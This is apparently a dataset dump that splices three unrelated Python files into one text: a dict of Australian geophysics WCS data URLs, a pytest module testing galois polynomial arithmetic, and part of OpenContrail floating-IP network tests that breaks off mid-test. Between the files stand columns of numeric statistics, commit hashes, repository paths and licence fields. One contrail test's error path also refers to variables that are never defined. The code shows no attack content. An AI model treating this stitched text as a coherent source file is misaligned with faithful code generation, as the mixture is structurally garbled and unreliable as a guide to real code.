"""
RADMAP = {
'filtered_terrestrial_dose': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/radmap_v3_2015_filtered_dose/radmap_v3_2015_filtered_dose.nc',
'filtered_potassium_pct': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/radmap_v3_2015_filtered_pctk/radmap_v3_2015_filtered_pctk.nc',
'filtered_thorium_ppm': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/radmap_v3_2015_filtered_ppmth/radmap_v3_2015_filtered_ppmth.nc',
'filtered_uranium_ppm': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/radmap_v3_2015_filtered_ppmu/radmap_v3_2015_filtered_ppmu.nc'
}
MAGNETICS = {
'variable_reduction_to_pole': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/magmap_v6_2015_VRTP/magmap_v6_2015_VRTP.nc',
'total_magnetic_intensity': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/magmap_v6_2015/magmap_v6_2015.nc'
}
# For some reason a couple of these are b0rked
ASTER = {
'aloh_group_composition': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_AlOH_group_composition_reprojected.nc4',
'ferrous_iron_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_Ferrous_Iron_Index_reprojected.nc4',
'opaque_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_Opaque_Index_reprojected.nc4',
'ferric_oxide_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_Ferric_oxide_content_reprojected.nc4',
# 'feoh_group_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_FeOH_group_content_reprojected.nc4',
'kaolin_group_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_Kaolin_group_index_reprojected.nc4',
'tir_quartz_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Quartz_Index_reprojected.nc4',
'mgoh_group_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_MgOH_group_content_reprojected.nc4',
# 'mgoh_group_composition': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_MgOH_group_composition_reprojected.nc4',
'ferrous_iron_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_Ferrous_iron_content_in_MgOH_reprojected.nc4',
'aloh_groun_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_AlOH_group_content_reprojected.nc4',
'thermal_infrared_gypsum_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Gypsum_Index_reprojected.nc4',
'thermal_infrared_silica_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Silica_Index_reprojected.nc4'
}
ASTER_TAS = {
'aloh_group_composition': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_AlOH_Group_composition_reprojected.nc4',
'ferrous_iron_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_Ferrous_Iron_index_reprojected.nc4',
'opaque_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_Opaque_index_reprojected.nc4',
'ferric_oxide_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_Ferric_Oxide_content_reprojected.nc4',
# 'feoh_group_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_FeOH_Group_content_reprojected.nc4',
'kaolin_group_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_Kaolin_group_index_reprojected.nc4',
'tir_quartz_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Quartz_Index_reprojected.nc4',
'mgoh_group_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_MgOH_group_content_reprojected.nc4',
# 'mgoh_group_composition': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_MgOH_group_composition_reprojected.nc4',
'ferrous_iron_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_Ferrous_iron_in_MgOH_content_reprojected.nc4',
'aloh_groun_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_AlOH_group_content_reprojected.nc4',
'thermal_infrared_gypsum_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Gypsum_Index_reprojected.nc4',
'thermal_infrared_silica_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Silica_Index_reprojected.nc4'
}
GRAVITY = {
'isostatic_residual_gravity_anomaly': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/onshore_geodetic_Isostatic_Residual_v2_2016/onshore_geodetic_Isostatic_Residual_v2_2016.nc',
'bouger_gravity_anomaly': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/onshore_geodetic_Complete_Bouguer_2016/onshore_geodetic_Complete_Bouguer_2016.nc',
}
TOTAL_COVERAGES = len(ASTER) + len(GRAVITY) + len(RADMAP) + len(MAGNETICS)
| 89.413793
| 188
| 0.799846
| 807
| 5,186
| 4.80917
| 0.133829
| 0.061324
| 0.087606
| 0.113888
| 0.876063
| 0.833033
| 0.817315
| 0.817315
| 0.817315
| 0.817315
| 0
| 0.030867
| 0.056691
| 5,186
| 57
| 189
| 90.982456
| 0.762469
| 0.148862
| 0
| 0.146341
| 0
| 0.731707
| 0.879499
| 0.071298
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
96063f5109ed1d56ea93c00c9e0f30b1fa544945
| 3,712
|
py
|
Python
|
tests/polys/test_non_poly_arithmetic.py
|
mhostetter/galois
|
280a3e906083db6834c6f4f5370fbbe5805ff875
|
[
"MIT"
] | 65
|
2021-02-20T04:07:59.000Z
|
2022-03-13T10:14:58.000Z
|
tests/polys/test_non_poly_arithmetic.py
|
mhostetter/galois
|
280a3e906083db6834c6f4f5370fbbe5805ff875
|
[
"MIT"
] | 303
|
2021-02-22T19:36:25.000Z
|
2022-03-31T14:48:15.000Z
|
tests/polys/test_non_poly_arithmetic.py
|
mhostetter/galois
|
280a3e906083db6834c6f4f5370fbbe5805ff875
|
[
"MIT"
] | 9
|
2021-03-11T07:40:51.000Z
|
2022-03-06T20:13:17.000Z
|
"""
A pytest module to test polynomial and non-polynomial arithmetic.
"""
import pytest
import numpy as np
import galois
def test_add():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly + e == poly + e_poly
assert e + poly == e_poly + poly
# Not a Galois field array
with pytest.raises(TypeError):
poly + 1
with pytest.raises(TypeError):
1 + poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly + GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) + poly
def test_subtract():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly - e == poly - e_poly
assert e - poly == e_poly - poly
# Not a Galois field array
with pytest.raises(TypeError):
poly - 1
with pytest.raises(TypeError):
1 - poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly - GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) - poly
def test_multiply():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly * e == poly * e_poly
assert e * poly == e_poly * poly
# Not a Galois field array
with pytest.raises(TypeError):
poly * 1
with pytest.raises(TypeError):
1 * poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly * GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) * poly
def test_true_divide():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly / e == poly / e_poly
assert e / poly == e_poly / poly
# Not a Galois field array
with pytest.raises(TypeError):
poly / 1
with pytest.raises(TypeError):
1 / poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly / GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) / poly
def test_floor_divide():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly // e == poly // e_poly
assert e // poly == e_poly // poly
# Not a Galois field array
with pytest.raises(TypeError):
poly // 1
with pytest.raises(TypeError):
1 // poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly // GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) // poly
def test_mod():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly % e == poly % e_poly
assert e % poly == e_poly % poly
# Not a Galois field array
with pytest.raises(TypeError):
poly % 1
with pytest.raises(TypeError):
1 % poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly % GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) % poly
def test_equal():
GF = galois.GF(3)
poly = galois.Poly([2], field=GF)
assert poly == galois.Poly([2], field=GF)
# Not a polynomial
with pytest.raises(TypeError):
assert poly == GF(2)
with pytest.raises(TypeError):
poly == 2
| 25.424658
| 65
| 0.604795
| 555
| 3,712
| 3.996396
| 0.077477
| 0.067628
| 0.187556
| 0.1578
| 0.911632
| 0.898557
| 0.885032
| 0.87376
| 0.87376
| 0.87376
| 0
| 0.024164
| 0.275323
| 3,712
| 145
| 66
| 25.6
| 0.800372
| 0.143588
| 0
| 0.504951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138614
| 1
| 0.069307
| false
| 0
| 0.029703
| 0
| 0.09901
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82c4cbc08f701e8c7687ebdff2ff2f7a3f0afa9f
| 129,067
|
py
|
Python
|
scripts/floating_ip_tests.py
|
rombie/contrail-test
|
a68c71d6f282142501a7e2e889bbb232fdd82dc3
|
[
"Apache-2.0"
] | null | null | null |
scripts/floating_ip_tests.py
|
rombie/contrail-test
|
a68c71d6f282142501a7e2e889bbb232fdd82dc3
|
[
"Apache-2.0"
] | null | null | null |
scripts/floating_ip_tests.py
|
rombie/contrail-test
|
a68c71d6f282142501a7e2e889bbb232fdd82dc3
|
[
"Apache-2.0"
] | null | null | null |
# Need to import path to test/fixtures and test/scripts/
# Ex : export PYTHONPATH='$PATH:/root/test/fixtures/:/root/test/scripts/'
#
# To run tests, you can do 'python -m testtools.run tests'. To run specific tests,
# You can do 'python -m testtools.run -l tests'
# Set the env variable PARAMS_FILE to point to your ini file. Else it will try to pick params.ini in PWD
#
import re
import os
from novaclient import client as mynovaclient
from novaclient import exceptions as novaException
import fixtures
import testtools
import unittest
from contrail_test_init import *
from vn_test import *
from quantum_test import *
from vnc_api_test import *
from nova_test import *
from vm_test import *
from connections import ContrailConnections
from floating_ip import *
from policy_test import *
from multiple_vn_vm_test import *
from contrail_fixtures import *
from tcutils.wrappers import preposttest_wrapper
from tcutils.commands import *
from testresources import ResourcedTestCase
from floating_ip_test_resource import SolnSetupResource
import traffic_tests
from fabric.context_managers import settings
from fabric.api import run
class TestFipCases(testtools.TestCase, ResourcedTestCase, fixtures.TestWithFixtures):
resources = [('base_setup', SolnSetupResource)]
def __init__(self, *args, **kwargs):
testtools.TestCase.__init__(self, *args, **kwargs)
self.res = SolnSetupResource.getResource()
self.inputs = self.res.inputs
self.connections = self.res.connections
self.logger = self.res.logger
self.nova_fixture = self.res.nova_fixture
self.agent_inspect = self.connections.agent_inspect
self.cn_inspect = self.connections.cn_inspect
self.analytics_obj = self.connections.analytics_obj
self.vnc_lib = self.connections.vnc_lib
def __del__(self):
print "Deleting test_with_setup now"
SolnSetupResource.finishedWith(self.res)
def setUp(self):
super(TestFipCases, self).setUp()
if 'PARAMS_FILE' in os.environ:
self.ini_file = os.environ.get('PARAMS_FILE')
else:
self.ini_file = 'params.ini'
def tearDown(self):
print "Tearing down test"
super(TestFipCases, self).tearDown()
SolnSetupResource.finishedWith(self.res)
def runTest(self):
pass
# end runTest
@preposttest_wrapper
def test_communication_across_borrower_vm(self):
'''Test communication between the VMs who has borrowed the FIP from common FIP pool.
'''
result = True
fip_pool_name = 'some-pool1'
#fvn_name= self.res.fip_vn_name
fvn_fixture = self.res.fvn1_fixture
vn1_fixture = self.res.vn1_fixture
vn2_fixture = self.res.vn2_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn2_vm1_fixture = self.res.vn2_vm1_fixture
fvn_vm1_fixture = self.res.fvn1_vm1_fixture
fvn_subnets = self.res.fvn1_subnets
vm1_name = self.res.vn1_vm1_name
vn1_name = self.res.vn1_name
vn1_subnets = self.res.vn1_subnets
vm2_name = self.res.vn2_vm1_name
vn2_name = self.res.vn2_name
vn2_subnets = self.res.vn2_subnets
assert fvn_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert vn2_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert vn2_vm1_fixture.verify_on_setup()
assert fvn_vm1_fixture.verify_on_setup()
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vn1_vm1_fixture, fvn_fixture)
fip_id1 = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vn2_vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id1)
assert fip_fixture.verify_fip(fip_id1, vn2_vm1_fixture, fvn_fixture)
if not vn1_vm1_fixture.ping_with_certainty(fip_fixture.fip[fip_id1]):
result = result and False
# fip_fixture.disassoc_and_delete_fip(fip_id)
# fip_fixture.disassoc_and_delete_fip(fip_id1)
if not result:
self.logger.error('Test to ping between VMs %s and %s' %
(vm1_name, vm2_name))
assert result
return True
# end test_communication_across_borrower_vm
@preposttest_wrapper
def test_mutual_floating_ip(self):
'''Test communication when 2 VM in 2 diffrent VN borrowing FIP from each other.
'''
result = True
fip_pool_name1 = 'some-pool1'
fip_pool_name2 = 'some-pool2'
#fvn_name= self.res.fip_vn_name
fvn1_fixture = self.res.fvn1_fixture
fvn2_fixture = self.res.fvn2_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
fvn2_vm1_fixture = self.res.fvn2_vm1_fixture
fvn2_subnets = self.res.fvn2_subnets
fvn2_vm1_name = self.res.fvn2_vm1_name
assert fvn1_fixture.verify_on_setup()
assert fvn2_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, fvn2_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(
fip_id1, fvn2_vm1_fixture, fvn1_fixture)
fip_fixture2 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name2, vn_id=fvn2_fixture.vn_id))
assert fip_fixture2.verify_on_setup()
fip_id2 = fip_fixture2.create_and_assoc_fip(
fvn2_fixture.vn_id, fvn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture2.disassoc_and_delete_fip, fip_id2)
assert fip_fixture2.verify_fip(fip_id2, fvn1_vm1_fixture, fvn2_fixture)
if not fvn2_vm1_fixture.ping_with_certainty(fip_fixture2.fip[fip_id2]):
result = result and False
if not fvn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
# fip_fixture1.disassoc_and_delete_fip(fip_id1)
# fip_fixture2.disassoc_and_delete_fip(fip_id2)
if not result:
self.logger.error('Test to ping between VMs %s and %s' %
(vm1_name, vm2_name))
assert result
return result
# end test_mutual_floating_ip
@preposttest_wrapper
def test_exhust_Fip_pool_and_release_fip(self):
'''Test exhaustion of FIP pool and release and reuse of FIP
'''
# This test case combine 2 test case from the test plan
# 1. Test when FIP is released
# 2. Test with all the available floating IP pool used/ allocated to
# diffrent VMs
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn2_fixture = self.res.fvn2_fixture
fvn3_fixture = self.res.fvn3_fixture
vn1_fixture = self.res.vn1_fixture
vn2_fixture = self.res.vn2_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
fvn2_vm1_fixture = self.res.fvn2_vm1_fixture
fvn2_subnets = self.res.fvn2_subnets
fvn2_vm1_name = self.res.fvn2_vm1_name
fvn3_vm1_fixture = self.res.fvn3_vm1_fixture
fvn3_subnets = self.res.fvn3_subnets
fvn3_vm1_name = self.res.fvn3_vm1_name
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_vm2_fixture = self.res.vn1_vm2_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
vn1_vm2_name = self.res.vn1_vm2_name
vn2_vm1_fixture = self.res.vn2_vm1_fixture
vn2_vm2_fixture = self.res.vn2_vm2_fixture
vn2_subnets = self.res.vn2_subnets
vn2_vm1_name = self.res.vn2_vm1_name
vn2_vm2_name = self.res.vn2_vm2_name
assert fvn1_fixture.verify_on_setup()
assert fvn2_fixture.verify_on_setup()
assert fvn3_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
assert fvn3_vm1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert vn1_vm2_fixture.verify_on_setup()
assert vn2_vm1_fixture.verify_on_setup()
assert vn2_vm2_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn3_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
# Allocate FIP to multiple IP to exhaust the pool of 5 address
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn1_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn3_fixture)
fip_id2 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn1_vm2_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id2, vn1_vm2_fixture, fvn3_fixture)
fip_id3 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn2_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id3, vn2_vm1_fixture, fvn3_fixture)
fip_id4 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn2_vm2_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id4, vn2_vm2_fixture, fvn3_fixture)
self.logger.info(
'Here Floating IP pool is alreadu exhausted. Should not allow to add futher.Quantum Exception expected')
fip_id5 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, fvn1_vm1_fixture.vm_id)
if fip_id5 != None:
self.logger.error(
'FIP should not get created/asscocited as pool is already exhusted')
result = result and False
self.logger.info('Releasing one FIP.')
fip_fixture1.disassoc_and_delete_fip(fip_id1)
if not vn1_vm1_fixture.ping_to_ip(fvn3_vm1_fixture.vm_ip):
self.logger.info(
"Here ping should fail from VM as FIP is removed ")
else:
self.logger.error(
"Ping should fail. But ping is successful even after removal of FIP from VM %s" % (vn1_vm1_name))
result = result and False
self.logger.info('Now FIP should get created and asscociated with %s' %
(fvn1_vm1_name))
fip_id5 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, fvn1_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(
fip_id5, fvn1_vm1_fixture, fvn3_fixture)
if not fvn1_vm1_fixture.ping_with_certainty(fvn3_vm1_fixture.vm_ip):
result = result and False
fip_fixture1.disassoc_and_delete_fip(fip_id2)
fip_fixture1.disassoc_and_delete_fip(fip_id3)
fip_fixture1.disassoc_and_delete_fip(fip_id4)
fip_fixture1.disassoc_and_delete_fip(fip_id5)
if not result:
self.logger.error(
'Test Failed. Exhaustion of FIP pool test failed')
assert result
return result
# end test_exhust_floating_ip_and_further_block_add
@preposttest_wrapper
def test_extend_fip_pool_runtime(self):
'''Test addition of subnet in VN should extend FIP pool and communication from borrower VM to multiple subnet of allocating VNs
'''
# This test case combine 2 test case from the test plan
# 1. Test when more IP block is added to existing FIP
# 2. When the allocating VN has multiple subnet, borrower VM should
# able to communicate all the subnet
result = True
fip_pool_name1 = 'some-pool1'
additional_subnet = '180.1.1.0/24'
fvn1_fixture = self.res.fvn1_fixture
fvn2_fixture = self.res.fvn2_fixture
fvn3_fixture = self.res.fvn3_fixture
vn1_fixture = self.res.vn1_fixture
vn2_fixture = self.res.vn2_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
fvn2_vm1_fixture = self.res.fvn2_vm1_fixture
fvn2_subnets = self.res.fvn2_subnets
fvn2_vm1_name = self.res.fvn2_vm1_name
fvn3_vm1_fixture = self.res.fvn3_vm1_fixture
fvn3_subnets = self.res.fvn3_subnets
fvn3_vm1_name = self.res.fvn3_vm1_name
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_vm2_fixture = self.res.vn1_vm2_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
vn1_vm2_name = self.res.vn1_vm2_name
vn2_vm1_fixture = self.res.vn2_vm1_fixture
vn2_vm2_fixture = self.res.vn2_vm2_fixture
vn2_subnets = self.res.vn2_subnets
vn2_vm1_name = self.res.vn2_vm1_name
vn2_vm2_name = self.res.vn2_vm2_name
assert fvn1_fixture.verify_on_setup()
assert fvn2_fixture.verify_on_setup()
assert fvn3_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
assert fvn3_vm1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert vn1_vm2_fixture.verify_on_setup()
assert vn2_vm1_fixture.verify_on_setup()
assert vn2_vm2_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn3_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
# Allocate FIP to multiple IP to exhaust the pool of 5 address
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn1_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn3_fixture)
fip_id2 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn1_vm2_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id2, vn1_vm2_fixture, fvn3_fixture)
fip_id3 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn2_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id3, vn2_vm1_fixture, fvn3_fixture)
fip_id4 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn2_vm2_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id4, vn2_vm2_fixture, fvn3_fixture)
self.logger.info(
'Here Floating IP pool is already exhausted. Should not allow to add futher.Quantum Exception expected')
fip_id5 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, fvn1_vm1_fixture.vm_id)
if fip_id5 != None:
self.logger.error(
'FIP should not get created/asscocited as pool is already exhusted')
result = result and False
# Here we need to add further Subnet to FVN3
fvn3_fixture.add_subnet(additional_subnet)
# Launching additional VM which should get IP from additional subnet
additional_vm_fixture = self.useFixture(VMFixture(
project_name=self.inputs.project_name, connections=self.connections, vn_obj=fvn3_fixture.obj, vm_name='additional_vm'))
assert additional_vm_fixture.verify_on_setup()
# Now verify floating pool is also getting extended and available
fip_id5 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, fvn1_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(
fip_id5, fvn1_vm1_fixture, fvn3_fixture)
# Verify from borrower VM we can ping all the subnet of giving VN
if not fvn1_vm1_fixture.ping_with_certainty(fvn3_vm1_fixture.vm_ip):
result = result and False
if not fvn1_vm1_fixture.ping_with_certainty(additional_vm_fixture.vm_ip):
result = result and False
fip_fixture1.disassoc_and_delete_fip(fip_id1)
fip_fixture1.disassoc_and_delete_fip(fip_id2)
fip_fixture1.disassoc_and_delete_fip(fip_id3)
fip_fixture1.disassoc_and_delete_fip(fip_id4)
fip_fixture1.disassoc_and_delete_fip(fip_id5)
if not result:
self.logger.error(
'Test Failed. Extension of FIP pool and communication multiple subnet test fail')
assert result
return result
# end test_extend_fip_pool_runtime
@preposttest_wrapper
def test_service_restart_with_fip(self):
'''Test restart of agent and control service with floating IP
'''
result = True
fip_pool_name1 = 'some-pool1'
fip_pool_name2 = 'some-pool2'
#fvn_name= self.res.fip_vn_name
fvn1_fixture = self.res.fvn1_fixture
fvn2_fixture = self.res.fvn2_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
fvn2_vm1_fixture = self.res.fvn2_vm1_fixture
fvn2_subnets = self.res.fvn2_subnets
fvn2_vm1_name = self.res.fvn2_vm1_name
assert fvn1_fixture.verify_on_setup()
assert fvn2_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, fvn2_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(
fip_id1, fvn2_vm1_fixture, fvn1_fixture)
fip_fixture2 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name2, vn_id=fvn2_fixture.vn_id))
assert fip_fixture2.verify_on_setup()
fip_id2 = fip_fixture2.create_and_assoc_fip(
fvn2_fixture.vn_id, fvn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture2.disassoc_and_delete_fip, fip_id2)
assert fip_fixture2.verify_fip(fip_id2, fvn1_vm1_fixture, fvn2_fixture)
if not fvn2_vm1_fixture.ping_with_certainty(fip_fixture2.fip[fip_id2]):
result = result and False
if not fvn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
self.logger.info('Will restart compute services now')
for compute_ip in self.inputs.compute_ips:
self.inputs.restart_service('contrail-vrouter', [compute_ip])
sleep(10)
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
if not fvn2_vm1_fixture.ping_with_certainty(fip_fixture2.fip[fip_id2]):
result = result and False
if not fvn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
self.logger.info('Will restart control services now')
for bgp_ip in self.inputs.bgp_ips:
self.inputs.restart_service('contrail-control', [bgp_ip])
sleep(10)
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
if not fvn2_vm1_fixture.ping_with_certainty(fip_fixture2.fip[fip_id2]):
result = result and False
